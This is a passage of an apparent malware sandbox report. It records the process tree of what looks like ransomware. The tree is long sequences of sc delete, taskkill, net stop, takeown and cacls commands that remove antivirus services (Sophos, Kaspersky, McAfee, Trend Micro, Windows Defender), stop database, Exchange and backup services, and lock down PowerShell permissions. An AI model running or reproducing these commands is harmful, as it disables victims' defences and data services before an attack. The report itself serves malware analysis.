PID:1252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1028

C:\Windows\SysWOW64\sc.exe
sc delete "eCard-TTransServer"
4⤵
PID:1272

C:\Windows\SysWOW64\sc.exe
sc delete "DAService_TCP"
4⤵
- Launches sc.exe
PID:384

C:\Windows\SysWOW64\sc.exe
sc delete eCardMPService
4⤵
PID:1972

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:952

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1664

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:1776

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:892

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1120

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:1192

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
3⤵
- Modifies file permissions
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1768

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
3⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
3⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1252

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
3⤵
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:676

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
3⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1712

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
3⤵
PID:644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:964

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
3⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1664

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
3⤵
PID:1776

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1868

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
3⤵
- Modifies file permissions
PID:1464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1208

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
3⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1948

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
3⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:636

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
3⤵
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
3⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
3⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
3⤵
PID:1192

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
3⤵
- Launches sc.exe
PID:820

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
3⤵
PID:560

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
3⤵
PID:856

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
3⤵
PID:1792

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
3⤵
PID:1908

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
3⤵
PID:1156

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
3⤵
PID:1448

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
3⤵
PID:952

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
3⤵
PID:1500

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
3⤵
PID:1680

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
3⤵
PID:1664

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
3⤵
PID:1776

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
3⤵
PID:1984

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
3⤵
PID:1504

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
3⤵
PID:1208

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
3⤵
PID:2020

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
3⤵
- Launches sc.exe
PID:1948

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
3⤵
- Launches sc.exe
PID:1356

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
3⤵
PID:816

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:1544

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
3⤵
PID:384

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
3⤵
PID:616

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
3⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
3⤵
PID:1764

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
3⤵
PID:864

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
3⤵
PID:1604

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
3⤵
- Launches sc.exe
PID:1188

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
3⤵
PID:1768

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
3⤵
PID:1848

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
3⤵
- Launches sc.exe
PID:1800

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
3⤵
- Launches sc.exe
PID:1808

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
3⤵
PID:1652

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
3⤵
PID:888

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
3⤵
PID:1252

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:800

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
3⤵
PID:676

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
3⤵
- Launches sc.exe
PID:1712

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
3⤵
PID:1744

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
3⤵
PID:964

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
3⤵
- Launches sc.exe
PID:1748

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
3⤵
- Launches sc.exe
PID:796

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
3⤵
PID:984

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
3⤵
PID:1868

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
3⤵
PID:1464

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
3⤵
- Launches sc.exe
PID:436

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
3⤵
PID:1400

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
3⤵
PID:1520

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:636

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
3⤵
PID:680

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
3⤵
PID:2016

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
3⤵
PID:1812

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
3⤵
- Launches sc.exe
PID:1972

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
3⤵
PID:1640

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
3⤵
PID:1016

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
3⤵
- Launches sc.exe
PID:1324

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
3⤵
PID:1108

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
3⤵
- Launches sc.exe
PID:1516

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
3⤵
PID:1612

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
3⤵
PID:560

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
3⤵
PID:1704

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:1476

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
PID:880

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
3⤵
PID:1692

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
3⤵
- Launches sc.exe
PID:1792

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
3⤵
PID:1492

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
3⤵
- Launches sc.exe
PID:1156

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
3⤵
- Launches sc.exe
PID:644

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
3⤵
PID:1732

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
3⤵
- Launches sc.exe
PID:1500

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
3⤵
PID:1680

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
3⤵
PID:1664

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
3⤵
- Launches sc.exe
PID:1980

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
3⤵
PID:1984

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
3⤵
- Launches sc.exe
PID:1504

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
3⤵
- Launches sc.exe
PID:1208

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
3⤵
PID:2020

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
3⤵
- Launches sc.exe
PID:1120

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
3⤵
PID:1356

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
3⤵
PID:816

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
3⤵
PID:1544

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
3⤵
PID:660

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
3⤵
PID:616

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
3⤵
- Launches sc.exe
PID:1272

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
3⤵
PID:1764

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
3⤵
PID:864

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
3⤵
- Launches sc.exe
PID:1604

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
3⤵
PID:1188

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
3⤵
PID:1768

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
3⤵
PID:1848

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
3⤵
PID:1800

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
3⤵
- Launches sc.exe
PID:1808

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
3⤵
PID:1652

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
3⤵
- Launches sc.exe
PID:888

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
3⤵
PID:1252

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
3⤵
PID:800

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
3⤵
PID:676

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
3⤵
PID:952

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
3⤵
- Launches sc.exe
PID:1744

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
3⤵
PID:964

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
3⤵
PID:1748

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
3⤵
PID:1776

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
3⤵
PID:984

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
3⤵
PID:1868

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
3⤵
PID:1856

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
3⤵
PID:436

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
3⤵
PID:1948

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
3⤵
- Launches sc.exe
PID:1520

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
3⤵
PID:636

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
3⤵
PID:1596

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
3⤵
PID:2016

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
3⤵
PID:1812

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
3⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
3⤵
- Launches sc.exe
PID:1640

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
3⤵
PID:1912

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
3⤵
- Launches sc.exe
PID:1192

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
3⤵
- Launches sc.exe
PID:820

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
3⤵
PID:1516

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
3⤵
PID:856

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im PccNTMon.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im NTRtScan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmListen.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmCCSF.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmProxy.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmPfw.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im CNTAoSMgr.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlbrowser.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlwriter.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msmdsrv.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlceip.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im Ssms.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im SQLAGENT.EXE
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdhost.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:436

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1356

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im ReportingServicesService.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im pg_ctl.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im postgres.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:1504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:1464

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ISARS
3⤵
PID:384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
4⤵
PID:1988

C:\Windows\SysWOW64\net.exe
net stop MSSQL$MSFW
3⤵
PID:984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
4⤵
PID:1588

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ISARS
3⤵
PID:1208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
4⤵
PID:1856

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$MSFW
3⤵
PID:1640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
4⤵
PID:680

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:1520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net stop ReportServer$ISARS
3⤵
PID:864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$ISARS
4⤵
PID:1572

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:1272

C:\Windows\SysWOW64\net.exe
net stop WinDefend
3⤵
PID:880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:1192

C:\Windows\SysWOW64\net.exe
net stop mr2kserv
3⤵
PID:1604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mr2kserv
4⤵
PID:1156

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
3⤵
PID:1652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
4⤵
PID:1516

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFBA
3⤵
PID:1400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFBA
4⤵
PID:560

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
3⤵
PID:1940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
4⤵
PID:644

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA
3⤵
PID:636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA
4⤵
PID:1464

C:\Windows\SysWOW64\net.exe
net stop ShadowProtectSvc
3⤵
PID:1504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShadowProtectSvc
4⤵
PID:1988

C:\Windows\SysWOW64\net.exe
net stop SPAdminV4
3⤵
PID:384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPAdminV4
4⤵
PID:436

C:\Windows\SysWOW64\net.exe
net stop SPTimerV4
3⤵
PID:816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTimerV4
4⤵
PID:1596

C:\Windows\SysWOW64\net.exe
net stop SPTraceV4
3⤵
PID:1356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTraceV4
4⤵
PID:680

C:\Windows\SysWOW64\net.exe
net stop SPUserCodeV4
3⤵
PID:1640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
4⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net stop SPWriterV4
3⤵
PID:1520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPWriterV4
4⤵
PID:1572

C:\Windows\SysWOW64\net.exe
net stop SPSearch4
3⤵
PID:864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPSearch4
4⤵
PID:1272

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:820

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:912

C:\Windows\SysWOW64\net.exe
net stop firebirdguardiandefaultinstance
3⤵
PID:1692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
4⤵
PID:1188

C:\Windows\SysWOW64\net.exe
net stop ibmiasrw
3⤵
PID:660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ibmiasrw
4⤵
PID:1984

C:\Windows\SysWOW64\net.exe
net stop QBCFMonitorService
3⤵
PID:1156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService
4⤵
PID:1604

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:1516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:1652

C:\Windows\SysWOW64\net.exe
net stop QBPOSDBServiceV12
3⤵
PID:560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBPOSDBServiceV12
4⤵
PID:1400

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
3⤵
PID:644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
4⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
3⤵
PID:1464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
4⤵
PID:636

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:1988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:1504

C:\Windows\SysWOW64\net.exe
net stop "Simply Accounting Database Connection Manager"
3⤵
PID:984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
4⤵
PID:1544

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB1
3⤵
PID:1208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB1
4⤵
PID:1856

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB2
3⤵
PID:1352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB2
4⤵
PID:1812

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB3
3⤵
PID:1972

